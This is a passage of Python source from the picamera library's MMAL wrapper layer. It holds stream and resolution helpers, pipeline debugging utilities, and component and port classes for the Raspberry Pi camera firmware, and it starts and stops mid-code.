        return super(PiSensorMode, cls).__new__(
            cls, resolution, framerates, video, still, full_fov)
def open_stream(stream, output=True, buffering=65536):
    """
    This is the core of picamera's IO-semantics. It returns a tuple of a
    file-like object and a bool indicating whether the stream requires closing
    once the caller is finished with it.

    * If *stream* is a string, it is opened as a file object (with mode 'wb'
      if *output* is ``True``, and the specified amount of *buffering*). In
      this case the function returns ``(stream, True)``.

    * If *stream* is a stream with a ``write`` method (or a ``read`` method
      when *output* is ``False``), it is returned as ``(stream, False)``.

    * Otherwise *stream* is assumed to be a writeable buffer and is wrapped
      with :class:`BufferIO`. The function returns ``(stream, True)``.
    """
    # Accept ASCII filenames given as bytes too.
    if isinstance(stream, bytes):
        stream = stream.decode('ascii')
    opened = isinstance(stream, str)
    if opened:
        stream = io.open(stream, 'wb' if output else 'rb', buffering)
    else:
        try:
            # Probe for the required stream method without calling it.
            if output:
                stream.write
            else:
                stream.read
        except AttributeError:
            # Assume the stream is actually a buffer
            opened = True
            stream = BufferIO(stream)
            # NOTE(review): ``stream.writable`` is referenced, not called; if
            # BufferIO.writable is a method (as io.RawIOBase's is), the bound
            # method is always truthy and this check can never fire — confirm
            # against BufferIO's definition in picamera.streams.
            if output and not stream.writable:
                raise IOError('writeable buffer required for output')
    return (stream, opened)
def close_stream(stream, opened):
    """
    Finalize the result of :func:`open_stream`: when *opened* is ``True`` the
    stream was created by us and is closed; otherwise it belongs to the
    caller, so we merely attempt to flush it (if it supports flushing).
    """
    if opened:
        stream.close()
        return
    try:
        stream.flush()
    except AttributeError:
        # The object offers no flush method; nothing to do.
        pass
def to_resolution(value):
    """
    Converts *value* which may be a (width, height) tuple or a string
    containing a representation of a resolution (e.g. "1024x768" or "1080p")
    to a (width, height) tuple.
    """
    if isinstance(value, bytes):
        value = value.decode('utf-8')
    if isinstance(value, str):
        # A selection from https://en.wikipedia.org/wiki/Graphics_display_resolution
        # Feel free to suggest additions
        named_sizes = {
            'VGA': (640, 480),
            'SVGA': (800, 600),
            'XGA': (1024, 768),
            'SXGA': (1280, 1024),
            'UXGA': (1600, 1200),
            'HD': (1280, 720),
            'FHD': (1920, 1080),
            '1080P': (1920, 1080),
            '720P': (1280, 720),
            }
        try:
            width, height = named_sizes[value.strip().upper()]
        except KeyError:
            # Fall back to parsing a "<width>x<height>" string.
            width, height = (int(part.strip())
                             for part in value.upper().split('X', 1))
        return PiResolution(width, height)
    try:
        width, height = value
    except (TypeError, ValueError):
        raise PiCameraValueError("Invalid resolution tuple: %r" % value)
    return PiResolution(width, height)
def to_fraction(value, den_limit=65536):
    """
    Converts *value*, which can be any numeric type, an MMAL_RATIONAL_T, or a
    (numerator, denominator) tuple to a :class:`~fractions.Fraction` limiting
    the denominator to the range 0 < n <= *den_limit* (which defaults to
    65536).
    """
    # Try each known shape in turn: Fraction-like, float-like,
    # MMAL_RATIONAL_T-like, plain tuple, then anything Fraction() accepts.
    try:
        # int, long, or fraction
        num, den = value.numerator, value.denominator
    except AttributeError:
        try:
            # float
            num, den = value.as_integer_ratio()
        except AttributeError:
            try:
                # MMAL rational structure
                num, den = value.num, value.den
            except AttributeError:
                try:
                    # tuple
                    num, den = value
                    warnings.warn(
                        PiCameraDeprecated(
                            "Setting framerate or gains as a tuple is "
                            "deprecated; please use one of Python's many "
                            "numeric classes like int, float, Decimal, or "
                            "Fraction instead"))
                except (TypeError, ValueError):
                    # try and convert anything else to a Fraction directly
                    value = Fraction(value)
                    num, den = value.numerator, value.denominator
    # Ensure denominator is reasonable
    if den == 0:
        raise PiCameraValueError("Denominator cannot be 0")
    result = Fraction(num, den)
    if den > den_limit:
        result = result.limit_denominator(den_limit)
    return result
def to_rational(value):
    """
    Converts *value* (anything accepted by :func:`to_fraction`) to an
    MMAL_RATIONAL_T structure.
    """
    frac = to_fraction(value)
    return mmal.MMAL_RATIONAL_T(frac.numerator, frac.denominator)
def buffer_bytes(buf):
    """
    Given an object which implements the :ref:`buffer protocol
    <bufferobjects>`, this function returns the size of the object in bytes.
    The object can be multi-dimensional or include items larger than byte-size.
    """
    if not isinstance(buf, memoryview):
        buf = memoryview(buf)
    # memoryview.nbytes is defined as itemsize * product(shape) -- exactly
    # what reduce(mul, buf.shape) computed here before, but it also handles
    # zero-dimensional views (where reduce over an empty shape raised
    # TypeError)
    return buf.nbytes
def debug_pipeline(port):
    """
    Given an :class:`MMALVideoPort` *port*, this traces all objects in the
    pipeline feeding it (including components and connections) and yields each
    object in turn. Hence the generator typically yields something like:
    * :class:`MMALVideoPort` (the specified output port)
    * :class:`MMALEncoder` (the encoder which owns the output port)
    * :class:`MMALVideoPort` (the encoder's input port)
    * :class:`MMALConnection` (the connection between the splitter and encoder)
    * :class:`MMALVideoPort` (the splitter's output port)
    * :class:`MMALSplitter` (the splitter on the camera's video port)
    * :class:`MMALVideoPort` (the splitter's input port)
    * :class:`MMALConnection` (the connection between the splitter and camera)
    * :class:`MMALVideoPort` (the camera's video port)
    * :class:`MMALCamera` (the camera component)
    """
    # Reverse-lookup helpers: scan the registry of all live wrapper objects
    # for the one whose underlying C structure lives at the given address
    def find_port(addr):
        for obj in MMALObject.REGISTRY:
            if isinstance(obj, MMALControlPort):
                if ct.addressof(obj._port[0]) == addr:
                    return obj
        raise IndexError('unable to locate port with address %x' % addr)
    def find_component(addr):
        for obj in MMALObject.REGISTRY:
            if isinstance(obj, MMALBaseComponent) and obj._component is not None:
                if ct.addressof(obj._component[0]) == addr:
                    return obj
        raise IndexError('unable to locate component with address %x' % addr)
    assert isinstance(port, (MMALControlPort, MMALPythonPort))
    # Walk upstream from the given port: output port -> owning component ->
    # input port -> connection -> upstream output port -> ... until we hit a
    # component with no connection (typically the camera)
    while True:
        if port.type == mmal.MMAL_PORT_TYPE_OUTPUT:
            yield port
        if isinstance(port, MMALPythonPort):
            # Python-implemented ports hold a weakref to their owner
            comp = port._owner()
        else:
            comp = find_component(ct.addressof(port._port[0].component[0]))
        yield comp
        if not isinstance(comp, (MMALComponent, MMALPythonComponent)):
            break
        if comp.connection is None:
            break
        # Hop across the connection: yield the input (target) port, then the
        # connection itself, then continue from the upstream (source) port
        if isinstance(comp.connection, MMALPythonConnection):
            port = comp.connection._target
        else:
            port = find_port(ct.addressof(comp.connection._connection[0].in_[0]))
        yield port
        yield comp.connection
        if isinstance(comp.connection, MMALPythonConnection):
            port = comp.connection._source
        else:
            port = find_port(ct.addressof(comp.connection._connection[0].out[0]))
def print_pipeline(port):
    """
    Prints a human readable representation of the pipeline feeding the
    specified :class:`MMALVideoPort` *port*.
    """
    # Six display rows: 0=component/port names, 1=encoding, 2=buffers,
    # 3=bitrate, 4=frame geometry, 5=colorspace. Each pipeline object
    # contributes one cell to every row.
    rows = [[], [], [], [], [], []]
    # under_comp is True while the next port cell is the first one after a
    # component name; that cell also receives the row label (e.g. 'encoding')
    under_comp = False
    for obj in reversed(list(debug_pipeline(port))):
        if isinstance(obj, (MMALBaseComponent, MMALPythonBaseComponent)):
            rows[0].append(obj.name)
            under_comp = True
        elif isinstance(obj, MMALVideoPort):
            rows[0].append('[%d]' % obj._port[0].index)
            if under_comp:
                rows[1].append('encoding')
            if obj.format == mmal.MMAL_ENCODING_OPAQUE:
                rows[1].append(obj.opaque_subformat)
            else:
                rows[1].append(mmal.FOURCC_str(obj._port[0].format[0].encoding))
            if under_comp:
                rows[2].append('buf')
            rows[2].append('%dx%d' % (obj._port[0].buffer_num, obj._port[0].buffer_size))
            if under_comp:
                rows[3].append('bitrate')
            rows[3].append('%dbps' % (obj._port[0].format[0].bitrate,))
            if under_comp:
                rows[4].append('frame')
            rows[4].append('%dx%d@%sfps' % (
                obj._port[0].format[0].es[0].video.width,
                obj._port[0].format[0].es[0].video.height,
                obj.framerate))
            if under_comp:
                rows[5].append('colorspc')
                # last labelled row for this object; reset the flag here
                under_comp = False
            rows[5].append(mmal.FOURCC_str(obj._port[0].format[0].es[0].video.color_space))
        elif isinstance(obj, MMALPythonPort):
            rows[0].append('[%d]' % obj._index)
            if under_comp:
                rows[1].append('encoding')
            if obj.format == mmal.MMAL_ENCODING_OPAQUE:
                rows[1].append(obj.opaque_subformat)
            else:
                rows[1].append(mmal.FOURCC_str(obj._format[0].encoding))
            if under_comp:
                rows[2].append('buf')
            rows[2].append('%dx%d' % (obj.buffer_count, obj.buffer_size))
            if under_comp:
                rows[3].append('bitrate')
            rows[3].append('%dbps' % (obj._format[0].bitrate,))
            if under_comp:
                rows[4].append('frame')
                # Python ports have no colorspace label; reset the flag here
                under_comp = False
            rows[4].append('%dx%d@%sfps' % (
                obj._format[0].es[0].video.width,
                obj._format[0].es[0].video.height,
                obj.framerate))
            if under_comp:
                rows[5].append('colorspc')
            # colorspace is not tracked for Python-implemented ports
            rows[5].append('???')
        elif isinstance(obj, (MMALConnection, MMALPythonConnection)):
            # Connections render as a simple arrow between port columns
            rows[0].append('')
            rows[1].append('')
            rows[2].append('-->')
            rows[3].append('')
            rows[4].append('')
            rows[5].append('')
    # If the pipeline ended on a component, the row labels were never emitted
    if under_comp:
        rows[1].append('encoding')
        rows[2].append('buf')
        rows[3].append('bitrate')
        rows[4].append('frame')
        rows[5].append('colorspc')
    # Compute per-column widths, then render each row with cells aligned
    # according to the repeating pattern: center, left, center, right
    cols = list(zip(*rows))
    max_lens = [max(len(s) for s in col) + 2 for col in cols]
    rows = [
        ''.join('{0:{align}{width}s}'.format(s, align=align, width=max_len)
            for s, max_len, align in zip(row, max_lens, cycle('^<^>')))
        for row in rows
    ]
    for row in rows:
        print(row)
class MMALObject(object):
    """
    Abstract base for all wrappers around MMAL entities (components, ports,
    connections, and so on).

    Every instance registers itself in the class-level :attr:`REGISTRY` — a
    set of weak references — which allows live MMAL objects to be enumerated
    or looked up (e.g. by the pipeline debugging helpers) without the
    registry itself keeping them alive.
    """
    # The __weakref__ slot is required so that instances of __slots__
    # classes can still be weakly referenced by the registry
    __slots__ = ('__weakref__',)
    # Weak set of every MMALObject currently alive
    REGISTRY = weakref.WeakSet()
    def __init__(self):
        super(MMALObject, self).__init__()
        # Record this instance for later lookup; the weak reference means
        # registration never prolongs the object's lifetime
        MMALObject.REGISTRY.add(self)
class MMALBaseComponent(MMALObject):
    """
    Represents a generic MMAL component. Class attributes are read to determine
    the component type, and the OPAQUE sub-formats of each connectable port.
    """
    __slots__ = ('_component', '_control', '_inputs', '_outputs')
    # Name of the underlying MMAL component (e.g. b'vc.ril.camera');
    # overridden by concrete sub-classes
    component_type = b'none'
    # OPAQUE sub-format spoken by each input / output port, in port order;
    # the lengths of these tuples also define the expected port counts
    opaque_input_subformats = ()
    opaque_output_subformats = ()
    def __init__(self):
        """
        Creates the underlying MMAL component and wraps its control, input,
        and output ports in the appropriate Python port classes.

        Raises :exc:`PiCameraRuntimeError` if the firmware reports a port
        count different from what the class declarations imply.
        """
        super(MMALBaseComponent, self).__init__()
        # _component is a ctypes pointer to the C-level MMAL_COMPONENT_T
        self._component = ct.POINTER(mmal.MMAL_COMPONENT_T)()
        mmal_check(
            mmal.mmal_component_create(self.component_type, self._component),
            prefix="Failed to create MMAL component %s" % self.component_type)
        # Sanity-check the firmware's port counts against our declarations
        if self._component[0].input_num != len(self.opaque_input_subformats):
            raise PiCameraRuntimeError(
                'Expected %d inputs but found %d on component %s' % (
                    len(self.opaque_input_subformats),
                    self._component[0].input_num,
                    self.component_type))
        if self._component[0].output_num != len(self.opaque_output_subformats):
            raise PiCameraRuntimeError(
                'Expected %d outputs but found %d on component %s' % (
                    len(self.opaque_output_subformats),
                    self._component[0].output_num,
                    self.component_type))
        self._control = MMALControlPort(self._component[0].control)
        # Wrap each C-level port in the Python class matching its ES type
        port_class = {
            mmal.MMAL_ES_TYPE_UNKNOWN: MMALPort,
            mmal.MMAL_ES_TYPE_CONTROL: MMALControlPort,
            mmal.MMAL_ES_TYPE_VIDEO: MMALVideoPort,
            mmal.MMAL_ES_TYPE_AUDIO: MMALAudioPort,
            mmal.MMAL_ES_TYPE_SUBPICTURE: MMALSubPicturePort,
        }
        self._inputs = tuple(
            port_class[self._component[0].input[n][0].format[0].type](
                self._component[0].input[n], opaque_subformat)
            for n, opaque_subformat in enumerate(self.opaque_input_subformats))
        self._outputs = tuple(
            port_class[self._component[0].output[n][0].format[0].type](
                self._component[0].output[n], opaque_subformat)
            for n, opaque_subformat in enumerate(self.opaque_output_subformats))
    def close(self):
        """
        Close the component and release all its resources. After this is
        called, most methods will raise exceptions if called.
        """
        if self._component is not None:
            # ensure we free any pools associated with input/output ports
            for output in self.outputs:
                output.disable()
            for input in self.inputs:
                input.disable()
            mmal.mmal_component_destroy(self._component)
            # Null out all wrappers so stale ctypes pointers cannot be used
            self._component = None
            self._inputs = ()
            self._outputs = ()
            self._control = None
    @property
    def name(self):
        """
        The name of the underlying MMAL component, as reported by the
        firmware (an ASCII string).
        """
        return self._component[0].name.decode('ascii')
    @property
    def control(self):
        """
        The :class:`MMALControlPort` control port of the component which can be
        used to configure most aspects of the component's behaviour.
        """
        return self._control
    @property
    def inputs(self):
        """
        A sequence of :class:`MMALPort` objects representing the inputs
        of the component.
        """
        return self._inputs
    @property
    def outputs(self):
        """
        A sequence of :class:`MMALPort` objects representing the outputs
        of the component.
        """
        return self._outputs
    @property
    def enabled(self):
        """
        Returns ``True`` if the component is currently enabled. Use
        :meth:`enable` and :meth:`disable` to control the component's state.
        """
        return bool(self._component[0].is_enabled)
    def enable(self):
        """
        Enable the component. When a component is enabled it will process data
        sent to its input port(s), sending the results to buffers on its output
        port(s). Components may be implicitly enabled by connections.
        """
        mmal_check(
            mmal.mmal_component_enable(self._component),
            prefix="Failed to enable component")
    def disable(self):
        """
        Disables the component.
        """
        mmal_check(
            mmal.mmal_component_disable(self._component),
            prefix="Failed to disable component")
    def __enter__(self):
        # Support use as a context manager; closes the component on exit
        return self
    def __exit__(self, exc_type, exc_value, exc_tb):
        self.close()
    def __repr__(self):
        if self._component is not None:
            return '<%s "%s": %d inputs %d outputs>' % (
                self.__class__.__name__, self.name,
                len(self.inputs), len(self.outputs))
        else:
            return '<%s closed>' % self.__class__.__name__
class MMALControlPort(MMALObject):
    """
    Represents an MMAL port with properties to configure the port's parameters.
    """
    __slots__ = ('_port', '_params', '_wrapper')
    def __init__(self, port):
        """
        *port* is a ctypes pointer to the underlying MMAL_PORT_T structure.
        """
        super(MMALControlPort, self).__init__()
        self._port = port
        # Mapping-style access to the port's MMAL parameters
        self._params = MMALPortParams(port)
        # Holds the ctypes callback wrapper while the port is enabled; a
        # reference must be kept here to prevent the callback being garbage
        # collected while MMAL can still invoke it
        self._wrapper = None
    @property
    def index(self):
        """
        Returns an integer indicating the port's position within its owning
        list (inputs, outputs, etc.)
        """
        return self._port[0].index
    @property
    def enabled(self):
        """
        Returns a :class:`bool` indicating whether the port is currently
        enabled. Unlike other classes, this is a read-only property. Use
        :meth:`enable` and :meth:`disable` to modify the value.
        """
        return bool(self._port[0].is_enabled)
    def enable(self, callback=None):
        """
        Enable the port with the specified callback function (this must be
        ``None`` for connected ports, and a callable for disconnected ports).
        The callback function must accept two parameters which will be this
        :class:`MMALControlPort` (or descendent) and an :class:`MMALBuffer`
        instance. Any return value will be ignored.
        """
        def wrapper(port, buf):
            # Wrap the raw buffer header; guarantee release even if the
            # user's callback raises
            buf = MMALBuffer(buf)
            try:
                callback(self, buf)
            finally:
                buf.release()
        if callback:
            self._wrapper = mmal.MMAL_PORT_BH_CB_T(wrapper)
        else:
            # Connected ports are enabled with a NULL callback
            self._wrapper = ct.cast(None, mmal.MMAL_PORT_BH_CB_T)
        mmal_check(
            mmal.mmal_port_enable(self._port, self._wrapper),
            prefix="Unable to enable port %s" % self.name)
    def disable(self):
        """
        Disable the port.
        """
        # NOTE: The test here only exists to avoid spamming the console; when
        # disabling an already disabled port MMAL dumps errors to stderr. If
        # this test isn't here closing a camera results in half a dozen lines
        # of ignored errors
        if self.enabled:
            try:
                mmal_check(
                    mmal.mmal_port_disable(self._port),
                    prefix="Unable to disable port %s" % self.name)
            except PiCameraMMALError as e:
                # Ignore the error if we're disabling an already disabled port
                if not (e.status == mmal.MMAL_EINVAL and not self.enabled):
                    raise e
        self._wrapper = None
    @property
    def name(self):
        """
        The name of the port, e.g. "vc.ril.camera:out:0". Any "(format)"
        suffix some firmwares append is stripped.
        """
        result = self._port[0].name.decode('ascii')
        if result.endswith(')'):
            try:
                # strip (format) from port names as it doesn't really belong
                # there (it doesn't identify the port in any way) and makes
                # matching some of the correctional cases a pain
                return result[:result.rindex('(')]
            except ValueError:
                return result
        else:
            return result
    @property
    def type(self):
        """
        The type of the port. One of:
        * MMAL_PORT_TYPE_OUTPUT
        * MMAL_PORT_TYPE_INPUT
        * MMAL_PORT_TYPE_CONTROL
        * MMAL_PORT_TYPE_CLOCK
        """
        return self._port[0].type
    @property
    def capabilities(self):
        """
        The capabilities of the port. A bitfield of the following:
        * MMAL_PORT_CAPABILITY_PASSTHROUGH
        * MMAL_PORT_CAPABILITY_ALLOCATION
        * MMAL_PORT_CAPABILITY_SUPPORTS_EVENT_FORMAT_CHANGE
        """
        return self._port[0].capabilities
    @property
    def params(self):
        """
        The configurable parameters for the port. This is presented as a
        mutable mapping of parameter numbers to values, implemented by the
        :class:`MMALPortParams` class.
        """
        return self._params
    def __repr__(self):
        if self._port is not None:
            return '<MMALControlPort "%s">' % self.name
        else:
            return '<MMALControlPort closed>'
class MMALPort(MMALControlPort):
    """
    Represents an MMAL port with properties to configure and update the port's
    format. This is the base class of :class:`MMALVideoPort`,
    :class:`MMALAudioPort`, and :class:`MMALSubPicturePort`.
    """
    __slots__ = ('_opaque_subformat', '_pool', '_stopped', '_connection')
    # A mapping of corrected definitions of supported_formats for ports with
    # particular names. Older firmwares either raised EINVAL, ENOSYS, or just
    # reported the wrong things for various ports; these lists are derived from
    # querying newer firmwares or in some cases guessing sensible defaults
    # (for ports where even the newer firmwares get stuff wrong).
    _supported_formats_patch = {
        'vc.ril.camera:out:2': [
            mmal.MMAL_ENCODING_I420,
            mmal.MMAL_ENCODING_NV12,
            mmal.MMAL_ENCODING_I422,
            mmal.MMAL_ENCODING_YUYV,
            mmal.MMAL_ENCODING_YVYU,
            mmal.MMAL_ENCODING_VYUY,
            mmal.MMAL_ENCODING_UYVY,
            mmal.MMAL_ENCODING_BGR24,
            mmal.MMAL_ENCODING_BGRA,
            mmal.MMAL_ENCODING_RGB16,
            mmal.MMAL_ENCODING_YV12,
            mmal.MMAL_ENCODING_NV21,
            mmal.MMAL_ENCODING_RGB24,
            mmal.MMAL_ENCODING_RGBA,
        ],
        'vc.ril.image_encode:in:0': [
            mmal.MMAL_ENCODING_RGB16,
            mmal.MMAL_ENCODING_RGB24,
            mmal.MMAL_ENCODING_RGBA,
            mmal.MMAL_ENCODING_BGRA,
            mmal.MMAL_ENCODING_I420,
            mmal.MMAL_ENCODING_I422,
            mmal.MMAL_ENCODING_NV12,
            mmal.MMAL_ENCODING_YUYV,
            mmal.MMAL_ENCODING_YVYU,
            mmal.MMAL_ENCODING_VYUY,
        ],
        'vc.ril.image_encode:out:0': [
            mmal.MMAL_ENCODING_JPEG,
            mmal.MMAL_ENCODING_GIF,
            mmal.MMAL_ENCODING_PNG,
            mmal.MMAL_ENCODING_BMP,
            mmal.MMAL_ENCODING_PPM,
            mmal.MMAL_ENCODING_TGA,
        ],
        'vc.ril.resize:in:0': [
            mmal.MMAL_ENCODING_RGBA,
            mmal.MMAL_ENCODING_BGRA,
            mmal.MMAL_ENCODING_RGB16,
            mmal.MMAL_ENCODING_I420,
            # several invalid encodings (lowercase versions of the priors)
            # appear here in modern firmwares but since they don't map to any
            # constants they're excluded
            mmal.MMAL_ENCODING_I420_SLICE,
        ],
        'vc.ril.resize:out:0': [
            mmal.MMAL_ENCODING_RGBA,
            mmal.MMAL_ENCODING_BGRA,
            mmal.MMAL_ENCODING_RGB16,
            mmal.MMAL_ENCODING_I420,
            # same invalid encodings as above here
            mmal.MMAL_ENCODING_I420_SLICE,
        ],
        'vc.ril.isp:in:0': [
            mmal.MMAL_ENCODING_BAYER_SBGGR8,
            mmal.MMAL_ENCODING_BAYER_SBGGR10DPCM8,
            mmal.MMAL_ENCODING_BAYER_SBGGR10P,
            mmal.MMAL_ENCODING_BAYER_SBGGR12P,
            mmal.MMAL_ENCODING_YUYV,
            mmal.MMAL_ENCODING_YVYU,
            mmal.MMAL_ENCODING_VYUY,
            mmal.MMAL_ENCODING_UYVY,
            mmal.MMAL_ENCODING_I420,
            mmal.MMAL_ENCODING_YV12,
            mmal.MMAL_ENCODING_I422,
            mmal.MMAL_ENCODING_RGB24,
            mmal.MMAL_ENCODING_BGR24,
            mmal.MMAL_ENCODING_RGBA,
            mmal.MMAL_ENCODING_BGRA,
            mmal.MMAL_ENCODING_RGB16,
            mmal.MMAL_ENCODING_YUVUV128,
            mmal.MMAL_ENCODING_NV12,
            mmal.MMAL_ENCODING_NV21,
        ],
        'vc.ril.isp:out:0': [
            mmal.MMAL_ENCODING_YUYV,
            mmal.MMAL_ENCODING_YVYU,
            mmal.MMAL_ENCODING_VYUY,
            mmal.MMAL_ENCODING_UYVY,
            mmal.MMAL_ENCODING_I420,
            mmal.MMAL_ENCODING_YV12,
            mmal.MMAL_ENCODING_I422,
            mmal.MMAL_ENCODING_RGB24,
            mmal.MMAL_ENCODING_BGR24,
            mmal.MMAL_ENCODING_RGBA,
            mmal.MMAL_ENCODING_BGRA,
            mmal.MMAL_ENCODING_RGB16,
            mmal.MMAL_ENCODING_YUVUV128,
            mmal.MMAL_ENCODING_NV12,
            mmal.MMAL_ENCODING_NV21,
        ],
        'vc.null_sink:in:0': [
            mmal.MMAL_ENCODING_I420,
            mmal.MMAL_ENCODING_RGB24,
            mmal.MMAL_ENCODING_BGR24,
            mmal.MMAL_ENCODING_RGBA,
            mmal.MMAL_ENCODING_BGRA,
        ],
    }
    def __init__(self, port, opaque_subformat='OPQV'):
        """
        *port* is a ctypes pointer to the underlying MMAL_PORT_T;
        *opaque_subformat* identifies what the port produces when configured
        for the OPAQUE encoding (see :attr:`opaque_subformat`).
        """
        super(MMALPort, self).__init__(port)
        self.opaque_subformat = opaque_subformat
        # Buffer pool; created by enable() when a callback is given
        self._pool = None
        # Set True once the enable() callback signals end-of-processing
        self._stopped = True
        # The connection feeding or fed by this port, if any
        self._connection = None
    def __repr__(self):
        if self._port is not None:
            return '<MMALPort "%s": format=MMAL_FOURCC(%r) buffers=%dx%d>' % (
                self.name, mmal.FOURCC_str(self.format),
                self.buffer_count, self.buffer_size)
        else:
            return '<MMALPort closed>'
    def _get_opaque_subformat(self):
        return self._opaque_subformat
    def _set_opaque_subformat(self, value):
        self._opaque_subformat = value
    opaque_subformat = property(
        _get_opaque_subformat, _set_opaque_subformat, doc="""\
        Retrieves or sets the opaque sub-format that the port speaks. While
        most formats (I420, RGBA, etc.) mean one thing, the opaque format is
        special; different ports produce different sorts of data when
        configured for OPQV format. This property stores a string which
        uniquely identifies what the associated port means for OPQV format.
        If the port does not support opaque format at all, set this property to
        ``None``.
        :class:`MMALConnection` uses this information when negotiating formats
        for a connection between two ports.
        """)
    def _get_format(self):
        result = self._port[0].format[0].encoding
        # Workaround: some firmwares swap RGB24/BGR24; translate both ways so
        # callers always see consistent values
        if FIX_RGB_BGR_ORDER:
            return {
                mmal.MMAL_ENCODING_RGB24: mmal.MMAL_ENCODING_BGR24,
                mmal.MMAL_ENCODING_BGR24: mmal.MMAL_ENCODING_RGB24,
                }.get(result, result)
        else:
            return result
    def _set_format(self, value):
        if FIX_RGB_BGR_ORDER:
            value = {
                mmal.MMAL_ENCODING_RGB24: mmal.MMAL_ENCODING_BGR24,
                mmal.MMAL_ENCODING_BGR24: mmal.MMAL_ENCODING_RGB24,
                }.get(value, value)
        self._port[0].format[0].encoding = value
        if value == mmal.MMAL_ENCODING_OPAQUE:
            # OPAQUE always carries I420 as its encoding variant
            self._port[0].format[0].encoding_variant = mmal.MMAL_ENCODING_I420
    format = property(_get_format, _set_format, doc="""\
        Retrieves or sets the encoding format of the port. Setting this
        attribute implicitly sets the encoding variant to a sensible value
        (I420 in the case of OPAQUE).
        After setting this attribute, call :meth:`commit` to make the changes
        effective.
        """)
    @property
    def supported_formats(self):
        """
        Retrieves a sequence of supported encodings on this port.
        """
        try:
            mp = self.params[mmal.MMAL_PARAMETER_SUPPORTED_ENCODINGS]
        except PiCameraMMALError as e:
            if e.status in (mmal.MMAL_EINVAL, mmal.MMAL_ENOSYS):
                # Workaround: old firmwares raise EINVAL or ENOSYS when various
                # ports are queried for supported formats. The following is the
                # correct sequence for old firmwares (note: swapped RGB24 and
                # BGR24 order in still port) ... probably (vc.ril.camera:out:2
                # is definitely right, the rest are largely guessed based on
                # queries of later firmwares)
                try:
                    return MMALPort._supported_formats_patch[self.name]
                except KeyError:
                    # No patch for this port; re-raise the original error
                    raise e
            else:
                raise
        else:
            # Trim trailing zero entries; the parameter header's size bounds
            # the number of valid encoding slots
            result = [
                v for v in mp.encoding if v != 0
            ][:mp.hdr.size // ct.sizeof(ct.c_uint32)]
            # Workaround: Fix incorrect result on MMALImageEncoder.outputs[0]
            # from modern firmwares
            if self.name == 'vc.ril.image_encode:out:0' and result == [
                    mmal.MMAL_ENCODING_MP2V, mmal.MMAL_ENCODING_MP2V,
                    mmal.MMAL_ENCODING_H264, mmal.MMAL_ENCODING_H264,
                    mmal.MMAL_ENCODING_VP7, mmal.MMAL_ENCODING_VP7,
                    mmal.MMAL_ENCODING_VP6, mmal.MMAL_ENCODING_VP6]:
                return MMALPort._supported_formats_patch[self.name]
            else:
                return result
    def _get_bitrate(self):
        return self._port[0].format[0].bitrate
    def _set_bitrate(self, value):
        self._port[0].format[0].bitrate = value
    bitrate = property(_get_bitrate, _set_bitrate, doc="""\
        Retrieves or sets the bitrate limit for the port's format.
        """)
    def copy_from(self, source):
        """
        Copies the port's :attr:`format` from the *source*
        :class:`MMALControlPort`.
        """
        if isinstance(source, MMALPythonPort):
            mmal.mmal_format_copy(self._port[0].format, source._format)
        else:
            mmal.mmal_format_copy(self._port[0].format, source._port[0].format)
    def commit(self):
        """
        Commits the port's configuration and automatically updates the number
        and size of associated buffers according to the recommendations of the
        MMAL library. This is typically called after adjusting the port's
        format and/or associated settings (like width and height for video
        ports).
        """
        mmal_check(
            mmal.mmal_port_format_commit(self._port),
            prefix="Format couldn't be set on port %s" % self.name)
        # Workaround: Unfortunately, there is an upstream issue with the
        # buffer_num_recommended which means it can't currently be used (see
        # discussion in raspberrypi/userland#167). There's another upstream
        # issue with buffer_num_min which means we need to guard against 0
        # values...
        self._port[0].buffer_num = max(1, self._port[0].buffer_num_min)
        self._port[0].buffer_size = (
            self._port[0].buffer_size_recommended
            if self._port[0].buffer_size_recommended > 0 else
            self._port[0].buffer_size_min)
    @property
    def pool(self):
        """
        Returns the :class:`MMALPool` associated with the buffer, if any.
        """
        return self._pool
    def get_buffer(self, block=True, timeout=None):
        """
        Returns a :class:`MMALBuffer` from the associated :attr:`pool`. *block*
        and *timeout* act as they do in the corresponding
        :meth:`MMALPool.get_buffer`.
        """
        if not self.enabled:
            raise PiCameraPortDisabled(
                'cannot get buffer from disabled port %s' % self.name)
        return self.pool.get_buffer(block, timeout)
    def send_buffer(self, buf):
        """
        Send :class:`MMALBuffer` *buf* to the port.
        """
        # If a Python-implemented connection with a user callback feeds this
        # input port, give the callback a chance to modify or drop the buffer
        if (
                self.type == mmal.MMAL_PORT_TYPE_INPUT and
                isinstance(self._connection, MMALPythonConnection) and
                self._connection._callback is not None):
            try:
                modified_buf = self._connection._callback(self._connection, buf)
            except:
                buf.release()
                raise
            else:
                if modified_buf is None:
                    # Callback consumed the buffer; nothing to send
                    buf.release()
                    return
                else:
                    buf = modified_buf
        try:
            mmal_check(
                mmal.mmal_port_send_buffer(self._port, buf._buf),
                prefix="cannot send buffer to port %s" % self.name)
        except PiCameraMMALError as e:
            # If port is disabled, convert exception for convenience
            if e.status == mmal.MMAL_EINVAL and not self.enabled:
                raise PiCameraPortDisabled(
                    'cannot send buffer to disabled port %s' % self.name)
            else:
                raise
    def flush(self):
        """
        Flush the port.
        """
        mmal_check(
            mmal.mmal_port_flush(self._port),
            prefix="Unable to flush port %s" % self.name)
    def _get_buffer_count(self):
        return self._port[0].buffer_num
    def _set_buffer_count(self, value):
        if value < 1:
            raise PiCameraMMALError(mmal.MMAL_EINVAL, 'buffer count <1')
        self._port[0].buffer_num = value
    buffer_count = property(_get_buffer_count, _set_buffer_count, doc="""\
        The number of buffers allocated (or to be allocated) to the port.
        The ``mmalobj`` layer automatically configures this based on
        recommendations from the MMAL library.
        """)
    def _get_buffer_size(self):
        return self._port[0].buffer_size
    def _set_buffer_size(self, value):
        if value < 0:
            raise PiCameraMMALError(mmal.MMAL_EINVAL, 'buffer size <0')
        self._port[0].buffer_size = value
    buffer_size = property(_get_buffer_size, _set_buffer_size, doc="""\
        The size of buffers allocated (or to be allocated) to the port. The
        size of buffers is typically dictated by the port's format. The
        ``mmalobj`` layer automatically configures this based on
        recommendations from the MMAL library.
        """)
    def enable(self, callback=None):
        """
        Enable the port with the specified callback function (this must be
        ``None`` for connected ports, and a callable for disconnected ports).
        The callback function must accept two parameters which will be this
        :class:`MMALControlPort` (or descendent) and an :class:`MMALBuffer`
        instance. The callback should return ``True`` when processing is
        complete and no further calls are expected (e.g. at frame-end for an
        image encoder), and ``False`` otherwise.
        """
        def wrapper(port, buf):
            # Invoked by MMAL on a background thread for each buffer
            buf = MMALBuffer(buf)
            try:
                if not self._stopped and callback(self, buf):
                    # Callback signalled completion; stop feeding it
                    self._stopped = True
            finally:
                buf.release()
                try:
                    # Return a buffer to the port to keep the pipeline fed
                    self._pool.send_buffer(block=False)
